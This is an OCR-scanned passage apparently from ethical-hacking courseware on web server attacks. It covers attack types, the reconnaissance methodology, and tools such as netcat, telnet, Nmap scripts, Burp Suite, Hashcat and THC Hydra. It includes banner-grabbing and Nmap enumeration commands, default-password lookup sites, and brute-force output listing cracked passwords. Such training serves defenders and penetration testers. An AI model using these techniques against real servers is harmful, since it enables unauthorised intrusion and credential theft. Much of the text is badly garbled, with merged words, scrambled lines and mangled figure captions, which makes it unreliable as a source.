vulnerabilitiesand compromise web applicationsand web server security.An attackercan
perform different typesof attackson vulnerableweb applications to breachweb server
security.
=
Parameter/Form
this
Tampering:
In
exchanged
the parameters
typeof tampering attack,the attackermanipulates
betweenthe clientand server to modify application
data,
suchas
user
CookieTampering:
as
well
credentialsandpermissions
Cookie-tampering
attacks occur
of
as priceandquantity products
when a cookie is sent from the
typesof toolshelpi n modifying
clientsideto the server. Different persistent andnon:
persistentcookies,
Attacks: Unvalidatedinput and file-injection
Unvalidated Input and File Injection
attacksare performedbysupplying filesinto a web
an unvalidatedinputor byinjecting
application,
Sessionhijacking
predicts,
1g:Session
and negotiates
is an attack i n whichthe attackerexploits,
the real validwebsession's controlmechanism
steals,
to accessthe

web
application.
authenticatedpartsof a
SQLInjection exploits
Attacks: SQLinjection thesecurity vulnerability
of a database
for
attacks.Theattackerinjectsmalicious whichare later passed
codeinto the strings, on to
theSQLserver for execution.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 traversal is the exploitation
Traversal:Directory
Directory of HTTPthrough
which
attackerscan access restricteddirectoriesand execute commands
outsideof the web
root directory
server's bymanipulating
(DoS)
Denial-of-Service
aURL.
Attack:A DoSattackis intendedto terminate the operations
of
website or server
‘a to makeit unavailable
for access byits intendedusers
Scripting
Cross-Site (SS)Attacks:In this method,
an attacker
injectsHTMLtagsor
scripts
into a targetwebsite.
BufferOverflowAttacks:Thedesign of most web applications
helps themi n sustaining
some amount of data. If that amount exceedsthe storagespaceavailable, the
application
advantage
may crashor exhibitsome other
andfloodsthe application
overflowattack.
vulnerable
behavior.An attackeruses this
with an excess amount of data,causinga buffer

Cross-SiteRequest (CSRF)
Forgery Attack: An attacker exploits
the trust of an

user
authenticated to
CommandInjection
passcode toweb
malicious or commands the
Attacks:In this typeof attack,
server.
a hackeraltersthe content of the
web page byusing HTML code and by identifying the form fields that lack valid
constraints,
SourceCodeDisclosure: Source-code disclosureis a resultof typographical errors i n
scriptsor misconfiguration,
suchas failureto grantexecutablepermissionsto a scriptor
directory. disclosurecan occasionally
Source-code allow attackersto access sensitive
informationaboutdatabasecredentials
andsecret keys to compromise the webserver.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Concepts
WebServer WebServer
‘Attacks

e °e
Counter:
Patch
sosasarea
Management
WebServer
Security
‘Tools

Web Server Attack Methodology

Ey tstormation
GatheringFootprinting Wen Server

WebsiteMirroring
BAwetnerapitiyscanning

Session
Mijacking
wer Passwords server Hacking

SE
Web ServerAttack Methodology
previoussection describedattacksthat an attackercan perform
‘The to compromisea web
server'ssecurity, This section explains how the attacker proceeds towards performing a
successfulattackon a web server. A web server attacktypically involvespreplanned
activities
calledan attackmethodology that an attackerfollowsto reachthe goalof breaching
the target
‘web
server'ssecurity

ical andCountermensores
Mackin ©by E-Comel
Copyright
 hacka webserver i n multiple
Attackers At eachstage,theattackerattemptsto gather
stages.
informationabout loopholes
and to gainunauthorizedaccess to the web server. Thefollowing
oftheattackmethodology
are thevarious stages forwebservers
Information Gathering
Every
attackertries to collectas muchinformationas possible
about the targetweb
Theattackergathers
server. andthenanalyzes
the information it to find lapses
i n the
mechanisms
current security of theweb server.
WebServerFootprinting
Thepurposeof footprinting is to gatherinformationaboutthe security
aspectsof a web
server with the helpof toolsor footprintingtechniques.
Through footprinting,
attackers
can determinethe web server's remote access capabilities, and services, and
its ports

other
aspects
of its security
WebsiteMirroring
Websitemirroringis a methodof copyinga websiteand its content onto anotherserver
for offlinebrowsing. With a mirrored website,an attackercan view the detailed
structure of thewebsite.

Vulnerability
Scanning
Vulnerability finding
scanningi s a methodof thevulnerabilitiesandmisconfigurations
of
web server,
‘a Attackersscan for vulnerabilitieswith the helpof automatedtoolsknown
asvulnerability
scanners.

Hijacking
Session
Attackerscan perform session hijacking
after identifying
the current session of the
client. The attackertakescomplete control over the user session through session
hijacking,
Hacking
WebServerPasswords
Attackersuse password-cracking hybrid
methodssuchas brute-forceattacks, attacks,
anddictionaryattacksto crackthewebserver'spassword,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 InformationGathering

1 Informationgathering
collecting
votes
information
aboutthe

‘newsgroups,the
\@-Astackerssearch Internet,
bulletin
for information
boards,
aboutthecompany
Cy

(@Astacers
use tooe
such
as Whois.net

‘Whos
‘he
databases
domain
name,
to getdeal suchas
P address,oF

Information Gathering
Informationgathering is the first andone of the most importantstepstowardhacking a target
server. In thisstep,
‘web an attacker collectsa s muchinformationas possibleaboutthe target.
server byusingvarious toolsand techniques. Theinformationobtainedfromthisstephelps the
attacker i n assessingthesecurity postureof thewebserver. Attackers maysearch the Internet,
newsgroups, bulletin boards,
Attackerscan use toolssuchas Whois.netandWhoisLookup target
andso on for gatheringinformationaboutthe organization,
to extract informationsuchas the

=
WHois
and
domainname, IPaddress,
target’s
autonomous systemnumber.

Source: https://www.whois.net
WHOis.net
is
user perform
designedhelpperform
to
a domainwhoissearch, whois
lookup
a varietyof
whoisIP lookup,
relevantinformationon domainregistration
functions.
It letsthe
andwhoisdatabasesearchfor
availability.
provides
and insight
It into a
domain'shistory andadditionalinformation,Thewhoislookup can be usedanytimeto

whoisaddresslistings
or even search a
determinewho owns a domainname, how many pagesfrom site are listedwith
Google, for a website’s
owner.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WHOIS LOOKUP

@erercoms rent oisterest

WHOis.net
5
°

The
following
additional
are
displaying
Figure
some
online
13.2: Screenshots

tools:
a WHOIs:net search
information-gathering
result

(https://whois.domaintools.com)
‘+
WhoisLookup
=
Whois(https://www.whois.com)
=
DNSstuff
WHOIS/IPWHOIS(https://tools.dnsstuff.com)
Lookup
=
(hetps://centralops.net)
DomainDossier
Find (https://pentest-tools.com)
Subdomains
Note: For complete
coverageof information-gathering
techniques,
refer to Module 02
Footprinting
andReconnaissance.
 InformationGathering
fromRobots.txtFile

filethesite
(©Therobotstt contain tof theweb
server directories
‘ner
andfilesthattheweb
wants to hie fromwebcrawlers,

file
Information
Robots
A n attacker
can simply
romthe URL
such
equestthe
and retrieve sensitive
as the root directory
andcontent management
at

structure
information
system
website
aboutt he target

fle ofatargetwebsite the

A attackerean alsodowload Robots xt
u singtheWet tool

Information Gathering
from Robots.txtFile
‘A
websiteowner creates a robots.txtfile to list the files or directoriesa web crawlershould
searchresults.Poorly
indexfor providing written robots.txtfiles can cause the complete
indexing
of websitefilesand directories.If confidentialfiles anddirectoriesare indexed,
an
attackermayeasily
obtaininformationsuchas passwords, emailaddresses, hiddenlinks,
and

membership
areas.
If the owner of the targetwebsitewrites the robots.txtfile without allowing the indexing of
restricted pagesforproviding an attackercan still view the robots.txtfileofthe
searchresults,
siteto discoverrestrictedfilesandthenview themto gather information,
URL/robots.txt
An attackertypes i n the address
barof a browserto view the targetwebsite's
robots.txtfile,An attackercan alsodownloadthe robots.txtfileof a targetwebsiteusingthe
Weettool.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Fle Est FormatView Help
User-agent: *

htm
en-us/windows/s4/mateix.
en-us/windows/s4/matesx.
html
/*/security/search-results.aspx?
Disallow: /*/music/*/search/
Disallow: /*/search/
Disallow: /*/musie/*/Search/
Disallow: /*/Search/
Disallow: /*/newsearch/
Disallow: *action-catalogsearch&
Allow: /*/store/*/search/
Allow: /*/store/*/layout/
Allow: /*/store/ausi¢/groove-music-pass/*
Allow: *action=catalogsearchécatalog_node-gridtpage-2$
Allow: taction-catalogsearchécatalog_mode-gridtpage-3$
Allow: mode=gridéoagend$
taction=catalogsearchécatalog
Allow: tactlon=catalogsearchécatalog_mode=gridtoage=5$
Allow: *action-catalogsearchécatalog_mode-gridtpage-6$
Allow: *action-catalogsearchécatalog_mode-gridtpage-7$
Allow:
Allow:
Allow:
taction-catalogsearché
mode=gridépag
taction=catalogsearché
mode=gridépag
*actionscatalogsearchécatalog_node=gridtpage=3$
Allow: *action-catalogsearchécatalog_mode-grictpage-4$
Allow: *action-catalogsearchécatalog_mode-gridipage-5$
Allow:
Allow: taction=catalogsearché
mode=gridépag
taction=catalogsearchécatalog_mode=gridtoage=7$
Allow: *action=catalogsearch&catalog_mode=gridtoage-8$
Disallow: *action-accessorysearchéproduct="8"
Allow: *action-accessorysearchiproduct="$
Disallow: *actionsaccessorysearch&

Figure displaying
13.2: Screenshot
a
robots fle

Module3 1635
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 WebServerFootprinting/Banner
Grabbing

versions, server names, anddtabareschema

‘etl

Telneta web serve to footprintawe server

andgather
information such a server name,
ene ype operating and
systems,

Use
tool such
a Netra, itprecon,
a nd

WebServerFootprinting/Banner
Grabbing
Byperforming web server footprinting,
an attackercan gathervaluablesystem-level
datasuch
as account details,OSs,softwareversions, server names, anddatabase schemadetails.The
Telnetutilitycan be usedto footprint a web server and gather informationsuchas server
name, server type,OSs, and runningapplicationsrunning.Furthermore,footprinting
toolssuch
as Netcraft,ID Serve, and httpreconcan be usedto perform web server footprinting.
These
footprintingtools can extract informationfrom the targetserver. Here,we examine the
featuresandtypesof informationthesetoolscan collectfromthe targetserver.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerFootprinting
Tools

Noteat

teste

Press
ewe
ine

Telnet

Web Server Footprinting

Tools
Netcraft
Source:https://www.netcraft.com
Netcraftdeterminesthe OSof the queried
host byexamining i n detail the network
characteristics
of the HTTP responsereceivedfromthe website.Netcraftidentifies
vulnerabilitiesi n the web server via indirectmethods;the fingerprinting
of the OS,
 andconfiguration
installedsoftware, of thatsoftwareyields
sufficient
information
to
determine
whether
is the server vulnerableto an exploit.

SearchWeb byDomain
Explore
wobsites extensions.
visitedbyusers ofthe Nateraft

13:23:Secenshotof Netraft
Figure
Netcat
Source:http://netcat.sourceforge.net
Netcat isa networkingutilitythat readsandwrites dataacross networkconnections by
usingthe TCP/IP It isa reliable“back-end―
protocol. tool useddirectly
or drivenbyother
programs Its alsoa networkdebugging
andscripts. andexplorationtool.
The following
are the commandsused to performbanner grabbing for
as an example
www.moviescope.com to gather
informationsuchas server typeand

© # nc -vv www, moviescope.com 80~pressEnter]

GET / HTTP/1.0-
press [Enter]
twice

Module3 1628
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
 Server identified as
Microsoft-11S/10.0

Figure
23.24:
Neteatoutput
=
Telnet
Source:https://docs.
microsoft.com
networkprotocol
Telneti s a client-server that is widely
usedon the Internetor LANS.It
provides
loginsessions for a user on the Internet. A single
terminalattachedto another
computer thesessionbyusingTelnet.Theprimarysecurity
emulates i ssueswithTelnet

are
©
the following,
datasent through
Itdoes not encrypt the connection.
© It lacks
scheme.
an authentication

to perform
Telnetenablesan attacker attack.It probes
a banner-grabbing HTTPservers
to determinethe server field i n theHTTPresponseheader.
For instance,the following
procedure
is utilizedto enumerate a hostrunningon HTTP
(TCP
80).
© Request
Telnetto connect to a hoston a specific
portwith thecommand# telnet
www.moviescope.com 80 andpressEnter.Ablankscreen appears.
© / HTTP/1.0
TypeGET and
TheHTTPserver responds
press
Enter
twice.
withthe informationshowni n thescreenshot,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Server identified as
Microsoft-11S/10.0

httprecon
Figure
Telnet
13.25: output

Source:https://www.computec.ch
is a tool for advanced
httprecon webserver fingerprinting.
Thistool performs
banner-
grabbing
attacks,
status codeenumeration, and headerordering
analysis
on the target
webserver andprovidesaccurateweb server fingerprinting
information.
httpreconperforms
the followingheaderanalysis test caseson the targetweb server:
A legitimate
GETrequest for an existing
resource

exceedingly
‘An longGET request(a UniformResource Identifier (URI)of >1024
bytes)
‘A
common GETrequest
for a non-existing
resource

‘A for an
common HEADrequest existing
resource

whichis allowed
Enumeration with OPTIONS,
whichis usually
TheHTTPmethodDELETE, not permitted
HTTPmethodTEST,
‘The whichis not defined
protocol
‘The version HTTP/9.8,
whichdoesnot exist
AGET requestincluding patterns(e.g., and96%)
attack
:./

ical andCountermensores
Mackin ©by E-Comel
Copyright
IDServe
Figure
13.26: of itprecon
Sereenshot

Source:https://www.gre.com
ID Serveis a simple
Internet server identificationutility.Thefollowing
is a list of its
capabilities.
© HTTP
Server
Identification:
‘website's
IDServecan identify
server software.ID Serve sends
the make,model,and version of a
thisinformationi n the preamble
to web queries,but theinformationis not visibleto the user.
of replies

Non-HTTP ServerIdentification:Most non-HTTP(non-web) Internet servers (e.g.,

FIP,SMTP, Post OfficeProtocol(POP), and NEWS) are required to transmit a line
containing a numeric status codeand @human-readable greeting to any connecting
client. Therefore, ID Serve can also connect with non-webservers to receive and
reportthe server'sgreetingmessage.This generally revealsthe server'smake,
model, version, andother potentiallyusefulinformation

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ReverseDNSLookup: WhenIDServeusersenter a site’s domainname or
or server's
URL,the application will use a DNS to determinethe IP addressof that domain.
However,it is occasionally usefulto proceed
i n theotherdirection
to determinethe
domainname associated with a knownIP address.Thisprocess,knownas reverse
DNSlookup, is alsobuilt into ID Serve.ID Serveattemptsto determinethe
associated
domainname for any enteredIPaddress.

@Bsn

Seve
ison
IDServer reesisecusrtmeraety ot 203 Gen Reseach
Ca.

| O8A/telp
|
BeckgioundSewerQuery

/one
frown
copy
©conivedhacke.com] ow
niu
inert ser RL Pash ou ca)

@ ] Herre sana
be
specie
tacntonsseone
[__temytieseves a

@ serene

@ Tn seriot
proach
to] aa

Thefollowing
are some
13.2:
additionalfootprinting
of
Figure ScreenshotO Serve
tools:
=
(https://github.com)
Recon-ng
#Uniscan(https://sourceforge.net)
Nmap (hetps://nmap.ora)
(https://github.com)
GhostEye
(https://code.google.com)
Skipfish

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerInformationUsing
Enumerating Nmap

WebServerInformation Using
Enumerating Nmap
Source:https://nmap.org
Nmap,along with the NmapScripting Engine (NSE), can extract a large
a mount of valuable
information fromthe targetweb server. In additionto Nmap commands, NSEprovides scripts

‘An
of
that revealvarious types useful informationaboutthe target
attackeruses the following commands
Nmap andNSEscripts
to
server an attacker.
to extract information,
*

Discover
domains
$nmap
hostmap:
virtual with
--script hostmap<host>
a server
that
usesmethod:
Detect vulnerable theTRACE
nmap --scripthttp-trace -p80 localhost
Harvestemailaccountswith http-google-email
$nmap
--script http-google-email<host>
u serswith http-userdir-enum:
Enumerate
nmap p80 --script http-userdir -enum localhost

Detect
HTTP
$nmap
TRACE
~p80 --scripthttp-trace <host>
bya webapplication
Checkifthe webserver is protected firewall(WAF)
or IPS

$nmapp80 --seript http-waf-detect --script-arge="http-waf-

detect uri=/testphp.vulnweb.com/artists.php,http-waf-
detect .detectBodyChanges― www modsecurity.org

ical andCountermensores
Mackin ©by E-Comel
Copyright
 c ommon webapplications
Enumerate
$nmap
--script http-enum-p80<host>
Obtainrobots.txt
$nmap -p80 --script http-robots.txt <host>
Thefollowing
are some additionalNmap commandsusedto extract webserver information:
nmap -sV-O -p target IP address
nmap ~sV --scripthttp-enum target IP address
nmap target IP address -p 80 --script http-frontpage-login
=

nmap --script http-passwd --script-args

target IP address
http-passwd.
root

13.28:Screenshotof Nmap
Figure

Module3 1644
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
 WebsiteMirroring

of
the
profile
Structure,
links,
et
ste’directory
fle structures, external

Search forcomments and othertems

i n theHTMLsource code

footprinting to make
activites more efficent

NCollector
Usetoolssuchas Stu,
WebsiteCopier,
UrTrack WebCopier

WebsiteMirroring
Websitemirroring copies an entire websiteand its content onto a localdrive.Themirrored
websiterevealsthe completeprofile of the site'sdirectory file structure,
structure, external
links,
images,web pages,andso on. Witha mirroredtarget
the website'sdirectories
and gain valuableinformation.
doesnot needto be online to go through
website,
an attackercan easily
An attacker
map
who copiesthe website
the targetwebsite.Furthermore, the attackercan
gainvaluableinformationbysearching the comments andother items i n the HTML source code
of downloadedweb pages.Many
examples
onto a localdrive; includeNCollectorStudio, a
websitemirroringtoolscan be usedto copy targetwebsite
HTTrackWebSite Copier, WebCopier
+
Ripper
Pro,andWebsite
Copier
NCollector Studio
http://www.calluna-software.com
Source:
NCollector
Studiois a websitemirroringtool usedto downloadcontent fromthe web to
alocal computer. Thistool enablesusers to crawlfor specificfile types,makeany
websiteavailablefor offline browsing, or simply download @ website to a local
‘computer.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 13:29:
Figure Screenshot
ofNColetorSto
Thefollowing
are some additionalwebsitemirroringtools:
=
HTTrack (https://www.
WebSiteCopier httrack.com)
+
WebCopier
Pro (http://www.
maximumsoft.com)
‘=
Website
RipperCopier(https://www.tensons.com)
(http://visualwebripper.com)
WebRipper
Cyotek
WebCopy (https://www.cyotek.com)

Module3 1646
Page tical MakingandCountermensores
by
Copyright©
Comet
 DefaultCredentialsof WebServer
Finding
\@
Manyweb
feces are
root
webserver
adminsratwe
andarinthe

{©en these
interfacespubliely
directory

scminstatve
interfacecredenttsarenot
properly remain setto default
configuredand

atten
identity
(@ Attackers
running
login
thedefault rede:
to the spptiaton

administrative
interacedocomentaton
© Canad the and

database
© Use
Metaspit'bltin oan the sree

Default Credentialsof WebServer

Finding
Administratorsor securitypersonnel use administrativeinterfacesto securely configure,
manage,andmonitorwebapplication servers. Many webserver administrativeinterfacesare
publiclyaccessibleand locatedin the root directory. Often,theseadministrativeinterface
are not properly
credentials configured and remain setto default.Attackersattemptto identify
the runningapplication
interfaceof the targetweb server byperforming portscanning.Once
the runningadministrativeinterfaceis identified,the attackeruses the following
techniques to
identify
thedefaultlogincredentials:
Consult andidentify
theadministrativeinterfacedocumentation the defaultpasswords
+

=
built-in
database
toscan
UseMetasploit’s

(http://open-sez.me)
Useonlineresourcessuchas OpenSezMe
the server
andcirt.net
(https://cirt.net/passwords) to identify
thedefaultpasswords
‘=
Attempt
and attacks
password-guessing
brute-forcing
defaultcredentialscan grantaccess to the administrativeinterface,
‘These the
compromising
web
server
a
andthe exploit
allowing attackerto the main web application.

Source:https://cirt.net/passwords
Cirt.net is a lookup
databasefor defaultpasswords,
credentials,
and ports.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 with

web application
securityscanner

Thefollowing
13.50Sereenshot
Figure
default
for theDS web
the
displaying of crt.net
password page
websites finding defaultpasswords
are some additional of server
administrative
interfaces:
=
http://open-sez.me
=
https://www-fortypoundhead.com
=
http://www.defaultpossword.us
https://default-password.info
Attps://www.routerpasswords.com

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DefaultContentof WebServer
Finding CEH

functionalities
inthewebservere

Usetooshe
Wht? (eps/rtnet
Utps//arasecurtyfocus.com)
dul content
teat the
andexploit

Default Contentof WebServer

Finding
Most servers of web applications
havedefaultcontents andfunctionalitiesthat allowattackers
to launchattacks.Thefollowing are somecommon defaultcontents andfunctionalities that an
attackerattemptsto identify
i n webservers.
‘=
Administratorsdebug
andtest functionality
Functionalitiesdesigned
for administratorsto debug,
diagnose,
and test web
applications
andweb servers contain usefulconfiguration
informationandthe runtime
state of boththe server andits runningapplications. thesefunctionalitiesare the
Hence,
forattackers.
main targets

‘Sample
functionality
sample
to demonstratecommon tasks
Manyservers contain various andpagesdesigned
scripts to demonstrate
certain
application server functionsand application
programming (APIs).
interfaces Often,web
servers fail to secure these scriptsfrom attackers,
and these sample
scriptseither
contain that can beexploited
vulnerabilities byattackers
or implement
functionalities
that allowattackersto exploit.
Publicly
accessiblepowerfulfunctions
webservers includepowerful
‘Some functionalities
that are intended
for administrative
personnel
and restrictedfrom public
use. However,attackersattemptto exploit
such
powerful
functionsto compromise the server and gain access. For example,
some
application
servers allowwebarchivesto be deployed over the same HTTP
portas that
usedbythe application. An attackermay use common exploitation
frameworkssuchas
to perform
Metasploit scanningto identify defaultpasswords,uploadbackdoors,and
gaincommand-shell access to the target
server.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Serverinstallation
manuals
attackerattemptsto identify
‘An server manuals,whichmaycontain usefulinformation
about configuration and server installation.Accessing this informationallowsthe
attackerto preparean appropriateframeworkto exploittheinstalledweb server.
Tools such as Nikto2 and exploit databases. such as_—SecurityFocus
(https://Awww.securityfocus.com)
can be usedto identifydefaultcontents.
=
Nikto2
Source:https://cirt.net
Nikto is a vulnerability
scanner usedextensively
to identify
potential
vulnerabilitiesi n
webapplications
and
webservers.

ie
i fiedhacker.

J
ERROR:Error Limit (20) reachedfor ho:
Error limit (28) reached for ho
ERROR:
terminated: 19 error(s) and 4 iten(s)
2019-11-1920:51:15

of
13.31Screenshot Nikto2
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Finding
Directory of WebServer
Listings
(©When
a
web
server
receives
directory,
to of
a requestforthe responds [Index /atiact

Finding
ter

“ryt
orleting
theattackers

recor stings

Directory
Whena web server

=
sometimespossessthefllowing

the
web
to compromise

discovering
the webserver

of WebServer
Listings
receives

tothe the ways.

responds requesti n following
a
server
vlnerabltiestat

directoryonthewebserver, make request

decry al try to acess the decry stings
‘same

exploit
software9990
vulnerable that gvesacces

requestfor

withinthedirectory
ReturnDefaultResource
a
forthe
allow

t o the

directory,
0ss
rather than a file,the web server

Theserver mayreturn a defaultresource withinthe directory,

suchas index.htm
ReturnError
Theserver mayreturn an error, suchas the HTTPstatus code403,indicating
that the
is not permitted
request
Return of directory
listing content
The server may return a listing
showing
the contents of the directory.
A sample
directory i s shownin the screenshot.
listing

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Indexof /

Pron

das 1800
ska? 13K
1308
i803

Bucisss1809
201801 30K
ois 10K

Be ovnonsnisat

20180019
dkearyml 1300-268

ease 809
Sis
93K
susan

1908
ak
oie
mates evn
neck 0180019180020

NEN
hon

neon 018M 13K

oisncoes 0181809 1H

Though
directory
Figure
listingsdo
13.2: Screenshot
not have significant
relevance
asample
displaying directory
from
listing
a security they
perspective,
occasionally
possess the following vulnerabilities
that allow attackers to compromiseweb
applications:
=

access
Improper controls
access
root
of
Unintentional to theweb
‘=

afterdiscovering
In general, a directory
servers
on a webserver, an attacker makesa requestforthat
directoryand attemptsto access the directory listing.
Attackersalso attemptto exploit
vulnerablewebserver softwarethat grantsa ccessto directorylistings.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Vulnerability
Scanning
Implementverity cto
\weakneses identity
andHf
na network determine the

‘Vulnerability
Scanning
Vulnerability
scanning is performed
web server or network.
to identify
Vulnerability
vulnerabilitiesandmisconfigurations
scanningrevealspossible
exploitin a web server attack. In the vulnerability-scanning
weaknesses
phase,
i n a target
i n a target server to
attackersuse sniffing
techniques to obtaindataon thenetwork trafficto determine activesystems, networkservices,
and applications.Automatedtools suchas AcunetixWebVulnerability Scannera re used to
perform vulnerability
scanningon a targetserver andfind hosts, services,andvulnerabilities.
=
AcunetixWebVulnerability
Scanner
Source:https://www.acunetix.com
AcunetixWebVulnerability Scanner(WVS) scans websitesanddetectsvulnerabilities.
WVSchecks
‘Acunetix webapplications for SQLinjections,XSS,and so on. It includes
advancedpen testingtools to ease manual security audit processes and creates
professionalsecurityaudit and regulatory compliance reportsbasedon AcuSensor
Technology.It supportsthe testingof web formsand password-protected areas, pages
with CAPTCHA, singlesign-on,and two-factorauthenticationmechanisms. It detects
application
languages, web server types,and smartphone-optimized sites. Acunetix
crawlsandanalyzes differenttypesof websites, including
HTMLS, Simple Object Access
Protocol(SOAP), andAsynchronous JavaScript andExtensibleMarkup Language (AJAX)
It supportsthe scanningof network services running on the server and the port
scanning
of
the
web server.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 acunetix

13:3; ScreenshotofAcunetix
Figure Web Vulnerability
Seanner

Thefollowing vulnerability
are some additional tools:
scanning
=
Fortify (https://www.microfocus.com)
Webinspect
+
Tenable.io(https://www.tenable.com)
=
Immuniweb(https://www.immuniweb.com)
©
Netsparker
(https://www.netsparker.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Finding Vulnerabilities
Exploitable

(inom ei come

machine
prio
gainghar

Finding Vulnerabilities
Exploitable
i n softwaredesign
Flawsandprogramming errors leadto securityvulnerabilities.Attackerstake
to perform
ofthesevulnerabilities
advantage various attackson the confidentiality,availability,
or integrityof
system.Softwarevulnerabilitiessuchas programmingflaws in a program,
a
kernelcan be exploited
service, or within theOSsoftware
or code.
to execute malicious
Manypublic
vulnerability that are availableonlineallow access to information
repositories
about various softwarevulnerabilities.Attackerssearchon exploit sites suchas SecurityFocus
(https://www.securityfocus.com) and Exploit Database(https://www.exploit-db.com) for
exploitable vulnerabilitiesof a web server basedon its OSandsoftwareapplications, Attackers
use theinformation gathered in the previousstages
to findthe relevant byusing
vulnerabilities
ExploitDatabase.
Exploiting
thesevulnerabilitiesallowsattackersto execute a commandor binary
o n a target
machineto gain higherprivileges than existingones or to bypass securitymechanisms.
Attackersusingtheseexploits
can even access privileged
user accountsandcredentials.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
13.34Screenshot
of Google Database
Hacking (GHB)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionHijacking

valiDs
1©Shit
to
gain
‘unauthorized
session
acces othe we
server to snoopdata

session
hijacking
Use
sucha session
Sidejscking,
Crosse
techniques
fhaton,session
et

ta
serpting,
validsession cookies
capture
andide
Usetoolssuch Suite,
as Burp
sMijack,Etereap,
et. to automate

SessionHijacking
Validsession IDscan besniffedto gain unauthorized
access to a web server andsnoop its data
attackercan hijack
‘An or stealvalidsessioncontentusingvarious techniques suchas session
token prediction,session replay,session fixation,sidejacking,
and XSS.By using these
techniques,the attackerattemptsto capture valid session cookiesand IDs i n established
sessions.Theattackerusestoolssuchas Burp Suite,Firesheep,andJHijack
to automate session
hijacking.
=
BurpSuite
Source:https://portswigger.net
BurpSuite is a web security
testingtool that can hijacksession IDsi n established
Sequencer
toolSuite
sessions.The
tests of i n Burp
this tool,a n attackercan predict
therandomnesssessiontokens.
the next possible
With
sessionIDtokenand use that to take

over
valid
session.
a

ical andCountermensores
Mackin ©by E-Comel
Copyright
 io

13.35:
Figure Sereenshot
of Bur Suite
Thefollowing
are some additionalsession hijacking
tools:
+
(hetps://sourceforge.net)
IMijack
=
(https://ettercap.github.io)
Ettercap
=

=
(https://github.com)
CookieCatcher
(https://github.com)
CookieCadger
Note:Forcomplete
coverage of concepts
andtechniques
relatedto session hijacking,
referto
11:
Module SessionHijacking,
 WebServerPasswordHacking

WebServerPasswordHacking
In this phase
of web server hacking,an attackerattemptsto crackweb server passwords. The
attackermay employ all possible
techniques of password crackingto extract passwords,
including password guessing,dictionary attacks,brute-force attacks,hybridattacks,
precomputed hashes, rule-basedattacks,distributednetworkattacks,
andrainbowattacks.The
attackerneedspatience to crackpasswords becausesome of thesetechniques are tediousand
time-consuming. Theattackercan alsouse automatedtoolssuchas Hashcat, THC Hydra, and
Nerackto crackweb passwords andhashes.
=
Hasheat
Source:https://hashcat.net
Hashcat
is a cracker with multiple
compatible OSsandplatforms
andcan perform multi
hash(MD4, 5; SHA 224,256,384,512;RIPEMD-160;
-

etc.],multi-devicepassword
cracking.
Theattackmodesof thistool are straight,
combination, hybrid
bruteforce, dict
+mask,
andhybrid
+
mask dict.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 13.26Screenshot
Figure ofHasheat cracker
password
=
THCHydra
Source:https://github.com
THC Hydra parallelized
is a login
crackerthat can attacknumerous protocols.
Thistool is
proof-of-concept
code that provides researchersand securityconsultantsthe
possibility
todemonstratehow easyit wouldbe to gainunauthorizedremote access to
a system.

Currently, the following

this tool supports protocols:
Asterisk;
AppleFilingProtocol
{AFP);Cisco Authentication,
Authorization, (AAA);
and Accounting Cisco auth;Cisco

Versions
enable;Concurrent
POST;HTTP-GET;
HTTP-HEAD;
HTTPS-GET;
FORM-POST;
System
HTTP-POST;
(CVS);
Firebird;
HTTP-PROXY;
HTTPS-POST;
HTTPS-HEAD;
FTP;
HTTP-FORM-GET;
HTTPS-FORM-GET;HTTPS.
HTTP-Proxy;
ICQ;
Internet Message
HTTP-FORM-

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘Access (IMAP);
Protocol Chat(IRC);
Internet Relay LightweightDirectory
AccessProtocol
(LDAP); Memcached; MongoDB; Microsoft SQLServer; MySQL; Network Control
Protocol (NCP);NetworkNewsTransfer Protocol (NNTP); Oracle Oracle
Listener; system
Oracle;
identifier(SID); PC-Anywhere;personal computer NetworkFileSystem(PC-NFS);
POP3; Radmin;
Postgres; RemoteDesktop Protocol (RDP); Rexec; Rsh;
Rlogin; RealTime
Streaming Protocol(RTSP);SAPR/3; SessionInitiation Protocol(SIP);
ServerMessage
Block(SMB); Simple MailTransferProtocol(SMTP); SMTPEnum;Simple Network
Management Protocol(SNMP) vi+v2+v3;SOCKSS; SSH(vi andv2);SSHkey;Subversion;
TeamSpeak (152);Telnet; VMware-Auth; Virtual Network Computing (VNC); and
Extensible MessagingandPresence Protocol(XMPP)

parr
hydra
-L /root/Mordlists/Userr

=
10
fan Hauser/THC
vice organizations, or for illegal purpo:
ra. (https: //github .com/vanhauser-the/the-hydra)
overall 16 tasks, 41174 login tri
19,.10..10.10:
Liftp] host: 10.10.10. 10 word: apple
ATUSY4 tries/min, 4727 tries in 00:01n, 36447 to do in 00
min, 14103 00:03h, 27068 to do i n 00:0

0.10.10.
16. ord:
test
19,10,10.10 word: qwerty
¢

S/min, 8214 to do in 00:02h,

nin, 37650 tries in 00:08n, 3524 to do

successfullycompleted,
t

8
3 valid passwordsfound
[WARNING]
Writing restore file because final worker threads did not complet
until end
or could
not be
connected
complete
finished at
con/vanhauser-thc/the-hydra)
‘github.

Thefollowing
Figure Screenshot
13,7: password
of THC
Hydra
cracking
are some additionalpassword tools:
cracker
=
Nerack(https://nmap.ora)
+
(http://project-rainbowerack.com)
Rainbowcrack
+
(htep://www.edge-security.com)
Whuzz
Wireshark(https://www.wireshark.org)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Using Serveras a Proxy
Application
